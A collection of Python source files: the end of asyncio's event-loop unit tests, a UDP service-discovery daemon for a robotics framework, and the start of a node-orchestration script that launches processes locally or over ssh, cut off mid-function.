self.assertEqual(srv_proto.nbytes, 100)
self.assertEqual(srv_proto.data, self.DATA[1000:1100])
self.assertEqual(self.file.tell(), 1100)
def test_sendfile_ssl_partial(self):
srv_proto, cli_proto = self.prepare_sendfile(is_ssl=True)
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file, 1000, 100))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, 100)
self.assertEqual(srv_proto.nbytes, 100)
self.assertEqual(srv_proto.data, self.DATA[1000:1100])
self.assertEqual(self.file.tell(), 1100)
def test_sendfile_close_peer_after_receiving(self):
srv_proto, cli_proto = self.prepare_sendfile(
close_after=len(self.DATA))
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
cli_proto.transport.close()
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_ssl_close_peer_after_receiving(self):
srv_proto, cli_proto = self.prepare_sendfile(
is_ssl=True, close_after=len(self.DATA))
ret = self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertEqual(ret, len(self.DATA))
self.assertEqual(srv_proto.nbytes, len(self.DATA))
self.assertEqual(srv_proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sendfile_close_peer_in_middle_of_receiving(self):
srv_proto, cli_proto = self.prepare_sendfile(close_after=1024)
with self.assertRaises(ConnectionError):
self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertTrue(1024 <= srv_proto.nbytes < len(self.DATA),
srv_proto.nbytes)
self.assertTrue(1024 <= self.file.tell() < len(self.DATA),
self.file.tell())
self.assertTrue(cli_proto.transport.is_closing())
def test_sendfile_fallback_close_peer_in_middle_of_receiving(self):
def sendfile_native(transp, file, offset, count):
# to raise SendfileNotAvailableError
return base_events.BaseEventLoop._sendfile_native(
self.loop, transp, file, offset, count)
self.loop._sendfile_native = sendfile_native
srv_proto, cli_proto = self.prepare_sendfile(close_after=1024)
with self.assertRaises(ConnectionError):
self.run_loop(
self.loop.sendfile(cli_proto.transport, self.file))
self.run_loop(srv_proto.done)
self.assertTrue(1024 <= srv_proto.nbytes < len(self.DATA),
srv_proto.nbytes)
self.assertTrue(1024 <= self.file.tell() < len(self.DATA),
self.file.tell())
@unittest.skipIf(not hasattr(os, 'sendfile'),
"Don't have native sendfile support")
def test_sendfile_prevents_bare_write(self):
srv_proto, cli_proto = self.prepare_sendfile()
fut = self.loop.create_future()
async def coro():
fut.set_result(None)
return await self.loop.sendfile(cli_proto.transport, self.file)
t = self.loop.create_task(coro())
self.run_loop(fut)
with self.assertRaisesRegex(RuntimeError,
"sendfile is in progress"):
cli_proto.transport.write(b'data')
ret = self.run_loop(t)
self.assertEqual(ret, len(self.DATA))
def test_sendfile_no_fallback_for_fallback_transport(self):
transport = mock.Mock()
transport.is_closing.side_effect = lambda: False
transport._sendfile_compatible = constants._SendfileMode.FALLBACK
with self.assertRaisesRegex(RuntimeError, 'fallback is disabled'):
self.loop.run_until_complete(
self.loop.sendfile(transport, None, fallback=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
SendfileMixin,
SockSendfileMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SendfileMixin,
SockSendfileMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin,
SendfileMixin,
SockSendfileMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = CoroLike()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
discovery_service.py
|
################################################################################
# Copyright (C) 2016-2020 Abstract Horizon
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License v2.0
# which accompanies this distribution, and is available at
# https://www.apache.org/licenses/LICENSE-2.0
#
# Contributors:
# Daniel Sendula - initial API and implementation
#
#################################################################################
import os
import socket
import fcntl
import struct
import threading
import subprocess
import traceback
from discovery.interfaces import get_interfaces
from local_resources import Resource
class Discovery:
def __init__(self, typ):
self._type = typ
self._debug = False
self._receiving_socket = None
self._thread = None
self._stop = False
self._services = {}
self._callbacks = {}
self._scan_for_services()
def _scan_for_services(self):
root = Resource("/")
for file in root.list():
if file.endswith("/"):
discovery_filename = os.path.join(file, "DISCOVERY.py")
try:
# print(f"Checking if '{discovery_file}' existing... ")
with Resource(discovery_filename) as discovery_file:
print(f"Running '{discovery_filename}'...")
code = discovery_file.read().decode("utf-8")
try:
_globals = {"discovery": self}
exec(compile(code, "DISCOVERY.py", 'exec'), _globals)
print(f"Done '{discovery_filename}'.")
except Exception as e:
print(f"WARNING: while processing '{discovery_filename}': {e}\n{''.join(traceback.format_tb(e.__traceback__))}")
except FileNotFoundError:
pass
def register_service(self, name, value):
self._services[name] = value
def deregister_service(self, name):
del self._services[name]
def register_dynamic_service(self, name, callback):
self._callbacks[name] = callback
def deregiser_dynamic_service(self, name):
del self._callbacks[name]
@staticmethod
def _get_ip_address_from_interface(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, bytearray(struct.pack('256s', bytes(ifname[:15], 'utf-8'))))[20:24])
@staticmethod
def _get_hostname():
hostname = "UNKNOWN"
if os.path.exists("/etc/hostname"):
with open("/etc/hostname", "rt") as textFile:
hostname = textFile.read()
else:
# noinspection PyBroadException
try:
hostname = subprocess.Popen('hostname', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) \
.stdout.readlines()[0].decode('ascii')
except Exception:
pass
hostname = hostname.split(".")[0].replace('\n', '')
if hostname.startswith("gcc-"):
hostname = hostname[4].upper() + hostname[5:]
hostname = hostname.replace("-", "")
return hostname
@staticmethod
def _get_ip_address(client_ip):
client_ip = client_ip.split('.')
def _calc_weight(ip1):
j = 0
while j < len(ip1) and j < len(client_ip) and ip1[j] == client_ip[j]:
j += 1
return j
all_ips = [iface.addrs['inet'].split('.') for iface in get_interfaces().values() if 'inet' in iface.addrs and 'broadcast' in iface.addrs]
ip_weights = {".".join(ip): _calc_weight(ip) for ip in all_ips}
return max(ip_weights, key=lambda k: ip_weights[k])
def _prepare_response(self, client_ip):
response_map = {
"IP": self._get_ip_address(client_ip),
"NAME": self._get_hostname(),
"TYPE": self._type}
for service_name in self._services:
response_map[service_name] = self._services[service_name]
for callback_name in self._callbacks:
callback = self._callbacks[callback_name]
callback(response_map)
return "A#" + ";".join([k + "=" + v for k, v in response_map.items()])
def _receive(self):
self._receiving_socket.settimeout(10)
if self._debug:
print(" Started receive thread...")
while not self._stop:
# noinspection PyBroadException
try:
data, addr = self._receiving_socket.recvfrom(1024)
request = str(data, 'utf-8')
if self._debug:
print("Received: " + str(request))
if request.startswith("Q#"):
p = {kv[0].strip(): kv[1].strip() for kv in [line.split("=") for line in [entry.replace('\n', '') for entry in request[2:].split(';')]]}
return_ip = p["IP"]
# noinspection PyBroadException
try:
return_port = int(p["PORT"])
except Exception:
return_port = 0xd15c
response = self._prepare_response(return_ip)
self._send(return_ip, return_port, response)
# except Exception as ex:
# print("ERROR: " + str(ex) + "\n" + ''.join(traceback.format_tb(ex.__traceback__)))
except Exception:
pass
def _send(self, ip, port, packet):
if self._debug:
print("Debug: sending packet to " + str(ip) + ":" + str(port) + " " + packet)
sending_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sending_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sending_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sending_socket.setblocking(False)
sending_socket.sendto(bytes(packet, 'utf-8'), (ip, port))
def start(self):
self._stop = False
self._receiving_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._receiving_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiving_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self._receiving_socket.bind(('', 0xd15c))
self._thread = threading.Thread(target=self._receive, args=())
self._thread.daemon = True
self._thread.start()
def stop(self):
self._stop = True
if __name__ == "__main__":
try:
import pyroslib
print("Starting discovery service...")
pyroslib.init("discovery-service")
discovery_service = Discovery("PYROS")
# discovery_service._debug = True
discovery_service.start()
print("Started discovery service.")
pyroslib.forever(0.5, priority=pyroslib.PRIORITY_LOW)
except Exception as ex:
print("ERROR: " + str(ex) + "\n" + ''.join(traceback.format_tb(ex.__traceback__)))
|
func.py
|
import threading, time, sys, os, socket
import getpass
from diggi_orchestration import *
from diggi_build import *
#Which process to debug
#setup key exchange beforehand
#ssh-keygen -t rsa # ENTER to every field
#ssh-copy-id myname@somehost
ownip = (([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
assert(len(ownip))
owndnsname = socket.gethostbyaddr(ownip)[0]
def run_node(port, identifier):
RunNode("output", port, identifier)
def run_node_debug(port, identifier):
#time.sleep(5) # debug late start
RunNodeDebug("output", port, identifier)
def run_node_valgrind(port,identifier):
RunNodeValgrind("output",port,identifier)
def run_node_sgx_debug(port,identifier):
RunNodeSGXDebug("output", port,identifier)
def run_node_callgrind(port,identifier):
RunNodeCallgrind("output",port,identifier)
def run_node_remote(host, port, identifier):
cmd = '''ssh -tt '''+ str(getpass.getuser()) + '''@''' + str(host) +''' "cd ~/output && ./diggi_base_executable --port '''+ str(port) +''' --id ''' + str(identifier) + '''" '''
print(cmd)
os.system(cmd)
def func_start():
json_configuration = get_diggi_configuration('configuration.json')
identifier = 0
debugtarget = int(json_configuration['DebugTargetProcess'])
debugengine = json_configuration['DebugEngine']
thread_arr = list()
for attribute, value in json_configuration['structure'].iteritems():
destination = ""
